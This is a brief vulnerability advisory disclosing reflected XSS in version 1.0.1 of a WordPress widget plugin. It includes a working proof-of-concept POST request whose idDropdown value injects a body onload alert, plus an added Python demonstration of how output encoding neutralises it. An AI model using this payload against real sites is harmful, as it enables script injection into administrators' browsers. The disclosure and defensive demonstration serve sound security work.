# ==============================================================
# Title ...| XSS in Widget Control Powered By Everyblock
# Version .| widget-control-powered-by-everyblock.1.0.1
# Date ....| 23.02.2014
# Found ...| HauntIT Blog
# Home ....| http://wordpress.org/plugins/
# ==============================================================
# ==============================================================
# XSS
---<request>---
POST /k/wordpress/wp-admin/admin.php?page=add-widget-slug HTTP/1.1
Host: 10.149.14.62
(...)
Content-Length: 52

idDropdown='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e
---<request>---
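Added example, not part of the original advisory or the plugin's code: it decodes the `idDropdown` value from the request above, reflects it into an assumed attribute context, and uses Python's HTML parser to compare the resulting markup with and without output encoding. `TEMPLATE` and the helper names are hypothetical; the plugin's real template is not shown on this page.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Form body copied verbatim from the request in this advisory.
BODY = "idDropdown='%3e\"%3e%3cbody%2fonload%3dalert(9999)%3e"

# ASSUMPTION: hypothetical output context; the plugin's template is not on the page.
TEMPLATE = '<input type="hidden" name="idDropdown" value="{}">'


class TagCollector(HTMLParser):
    """Record every start tag and its attributes as the parser sees them."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def decode_param(body, name="idDropdown"):
    """URL-decode one form field, as the server would receive it."""
    return parse_qs(body, keep_blank_values=True)[name][0]


def render(value, encode):
    """Reflect value into the attribute, with or without HTML output encoding."""
    return TEMPLATE.format(escape(value, quote=True) if encode else value)


def parse_tags(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def event_handlers(tags):
    """Return (tag, attribute) pairs for inline on* handlers found in the markup."""
    return [(tag, attr) for tag, attrs in tags for attr in attrs if attr.startswith("on")]


if __name__ == "__main__":
    value = decode_param(BODY)
    for encode in (False, True):
        tags = parse_tags(render(value, encode))
        print("encoded" if encode else "raw", [t for t, _ in tags], event_handlers(tags))
```

In WordPress, the equivalent encoding call at the output site is `esc_attr()`.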
# ==============================================================
# More @ http://HauntIT.blogspot.com
# Thanks! ;)
# o/